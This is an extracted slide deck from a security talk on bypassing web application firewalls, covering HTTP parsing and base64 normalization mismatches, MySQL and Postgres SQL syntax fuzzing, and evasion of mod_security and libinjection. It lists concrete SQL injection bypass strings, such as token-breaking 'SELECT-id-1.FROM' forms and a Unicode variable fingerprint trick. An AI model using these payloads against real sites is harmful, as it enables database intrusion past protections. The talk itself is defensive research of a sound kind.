Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Lie to Me: Bypassing Modern Web Application Firewalls

31,387 views

Published on

The report considers analysis of modern Web Application Firewalls. The author provides comparison of attack detection algorithms and discusses their advantages and disadvantages. The talk includes examples of bypassing protection mechanisms. The author points out the necessity of discovering a universal method of masquerading for vectors of various attacks via WAFs for different algorithms.

Published in: Technology

Lie to Me: Bypassing Modern Web Application Firewalls

  1. 1. bypassing modern webapplication firewalls@ONsec_lab, http://lab.onsec.ru
  2. 2. About• Security audits of webapps since 2009• @d0znpp twitter• @ONsec_lab twitter• Nice blog! http://lab.onsec.ru - [ENG]• d0znpp[at]ONsec[dot]ru еmаi1
  3. 3. WTF WAF?• Web Application Firewall• Prevent attacks• Attack !=Vulnerability• Risk != Attack
  4. 4. SoftwareVS Hardware• Different HTTP parsers• Many «hardware» WAFs used Apache,Lighttpd, Nginx forks
  5. 5. Implementation• Failover bypass:• DoS/DDoS WAF for bypass it- why not?!• What happens with traffic when yourfilter is overloaded?• XML, regexp, token bombs for this• Not so silently, right? :)
  6. 6. WAF work stages• Parse HTTP packet from client (web serverto this in general case)• Determine rules that must be applied tocurrent URL/client/hostname/etc• Normalize data (2-nd urldecode, base64,etc)• Do detection logic (such as regexpr)• Make detection decision (true/false/score)
  7. 7. WAF work stages• Parse HTTP packet from client (web serverto this in general case)• Determine rules that must be applied tocurrent URL/client/hostname/etc• Normalize data (2-nd urldecode, base64,etc)• Do detection logic (such as regexpr)• Make detection decision (true/false/score)
  8. 8. Protocol level buglooks like abyss
  9. 9. Parse HTTP packets• First read: «Protocol-Level Evasion of WebApplication Firewalls», Ivan Ristic, BH-US-2012• Nice yesterday bypass Imperva by@webpentest during PHDays WAF bypasscontest: Content-Type: invalid :)))• Classic example - HTTP ParameterPollution• Are you sure that WAF’s and webapp’sHTTP protocols are the same?
  10. 10. WAF work stages• Parse HTTP packet from client (web serverto this in general case)• Determine rules that must be applied tocurrent URL/client/hostname/etc• Normalize data (2-nd urldecode, base64,etc)• Do detection logic (such as regexpr)• Make detection decision (true/false/score)
  11. 11. Data normalizationlevel bug looks liketunnel
  12. 12. Data normalization• Format parsers, for example:• base64• xml• JSON• Are you sure that WAF’s and webapp’sparsers are the same?
  13. 13. Data normalization• mod_security, t:base64decode• decode string until first = char• PHP, base64_decode($strict=false)• decode whole string• Attack vector• YWFh=attackhere• Use t:base64DecodeExt!
  14. 14. Data normalization• Yet another example from yesterdayPHDays WAF bypass contest - ImpervaXML decoding• First decode XML, that validate attacks• XML input was not set up as XML type inWAF• Put attack as XML-encoded data (entities)to bypass regexpr: union select 123
  15. 15. WAF work stages• Parse HTTP packet from client (web serverto this in general case)• Determine rules that must be applied tocurrent URL/client/hostname/etc• Normalize data (2-nd urldecode, base64,etc)• Do detection logic (such as regexpr)• Make detection decision (true/false/score)
  16. 16. Detection logic buglooks like ninja
  17. 17. Detection logic• Regular expressions (mod_security, etc)• Tokenizers (libinjection)• ...
  18. 18. SQL syntax• First read this works:• http://websec.wordpress.com/tag/sql-obfuscation/• http://www.slideshare.net/nickgsuperstar/new-techniques-in-sql-obfuscation• Obfuscated vector is more than welcome!• Try to exploit
  19. 19. SQL syntax - time tofuzzing!• SELECT{$P1} 1 FROM...• ...UNION{$P2}FROM...• SELECT VERSION{$P3}()• SELECT{$P4}VERSION{P4}()• SELECT 1{P5}BAD
  20. 20. MySQL: the classics• SELECT{U} 1 FROM• ...UNION{U}FROM...• SELECT VERSION{U}()• {U} = [0x09,0x0A-0x0D,0x20,0xA0]*• Fuzzed only 1-bytes sequences, not /**/, etc
  21. 21. MySQL: time to fuzzing!• SELECT{F}VERSION{F}()• SELECT 1{D}BAD• {F} = {U} + 0x60 (backquote `)• {D} = # + 0x60• Have a fun with regexp:• select`version` ( )• ... where id=’1’`’ and ... - commented now
  22. 22. MySQL: break tokens!• SELECT{O}1 FROM test• {O} = [-+!~@]• SELECT 1{W}FROM test;• {W} = [.d?|ed]• Part of this discovered during our WAFbypass contest last year by @Black2Fan
  23. 23. MySQL: break tokens!• SELECT-1e1FROM test• SELECT~1.FROM test• SELECTNFROM test• SELECT@^1.FROM test• SELECT-id-1.FROM test• all tested on MySQL 5.1.66-0-squeeze1
  24. 24. Postgres: the classics• SELECT{U} 1 FROM• ...UNION{U}FROM...• SELECT VERSION{U}()• {U} = [0x09,0x0A,0x0C,0x0D,0x20]*• Fuzzed only 1-bytes sequences, not /**/, etc
  25. 25. Postgres: time to fuzz!• SELECT{F}VERSION{F}()• SELECT 1{D}BAD• {F} = {U} + 0x22 (doblequote ‘’)• {D} = # + 0x22• Have a fun with regexp:• select’’version’’ ( )• ... where id=’1’`’ and ... - commented now
  26. 26. Postgres: break tokens!• SELECT{O}1 FROM test• {O} = [.-+!~@] - @ is absolute operator• SELECT 1{W}FROM test;• {W} = [.d?|ed|] - nothing is also OK!
  27. 27. Postgres: break tokens!• SELECT-1ROM test• SELECT.1FROM test• SELECT~1FROM test• SELECT-id-1FROM test• SELECT-id-1FROM test• all tested on PostgreSQL 9.2.4
  28. 28. Time to exploit!• mod_security• libinjection• others?
  29. 29. mod_security• CRS (https://github.com/SpiderLabs/owasp-modsecurity-crs)• base_rules• many regular expressions
  30. 30. mod_security• ?id=select id from test• ?id=select-id-1.from testMessage: Access denied with code 403 (phase 2). Pattern match "(?i:(?:unions*?(?:all|d i s t i n c t | [ ( ! @ ] * ? ) ? s * ? [ ( [ ] * ? s * ? s e l e c t s + ) | ( ? : w + s + l i ke s + [ " `xc2xb4xe2x80x99xe2x80x98])|(?:likes*?["`xc2xb4xe2x80x99xe2x80x98]%)|(?:["`xc2xb4xe2x80x99xe2x80x98]s*?likeW*?["`xc2xb4 ..." at ARGS:id. [file "/opt/modsecurity/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line"223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data"Matched Data: select id from found within ARGS:id: select id from test"] [severity"CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"]
  31. 31. mod_security• ?id=1 or 1=1 or• ?id=1 or true orMessage: Access denied with code 403 (phase 2). Pattern match "(?i:([s"` x c 2 x b 4 x e 2 x 8 0 x 9 9 x e 2 x 8 0 x 9 8 ( ) ] * ? ) ( [ d w ] + + ) ( [ s " `xc2xb4xe2x80x99xe2x80x98()]*?)(?:(?:=|<=>|r?like|soundss+like|regexp)([s"`xc2xb4xe2x80x99xe2x80x98()]*?)2|(?:!=|<=|>=|<>|<|>|^|iss+not|not ..." atA R G S : i d . [ fi l e " / o p t / m o d s e c u r i t y / r u l e s / b a s e _ r u l e s /modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg"SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1=1 found withinARGS:id: 1 or 1=1 or "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"][accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
  32. 32. libinjection• Token based detection• No more regexp!• Fingerprint for each attack 1-5 tokenssequence• 14 token types, 14^5+14^4+14^3+14^2+14~= 580k possible fingerprints• Is it enough to block all SQLi?
  33. 33. libinjection• Bytes obfuscation doesn’t works now• But...• What happens if you missed some tokens?
  34. 34. Attack #1. Missedtoken / fingerprint• As fuzzed above ` 0x60 byte can be used asa comment in MySQL and also as functionquotes• into outfile asd --• block - skksc• into outfile asd `• bypass - skksn
  35. 35. Attack #2.Tokenobfuscation• Find any unblocked fingerprint• Obfuscate your attack to produce the samefingerprint• Fingerprint have only 5 tokens• Need to exploit anti-obfuscation logic (1+1and others hardcoded token combinations)
  36. 36. Attack #2.Tokenobfuscation• Fingerprint «v1111» looks like safe• @a1a2a3a4 - variable but fingerprint of thisstring is «v», no numeric token here• @ф1й2у3ц4 - is valid variable for MySQL,but produce fingerprint «v1111»• @ф1й2у3ц4 union select ... producefingerprint «v1111» also :)
  37. 37. Some stats• Hacking WAFs since 2009• About 50 different implementations• About 10 different engines• Time to hack:• min: 3 min• max: 19 hours• average: 1hour
  38. 38. Questions?• @d0znpp twitter• @ONsec_lab twitter• Nice blog! http://lab.onsec.ru - [ENG]• d0znpp[at]ONsec[dot]ru еmаi1

×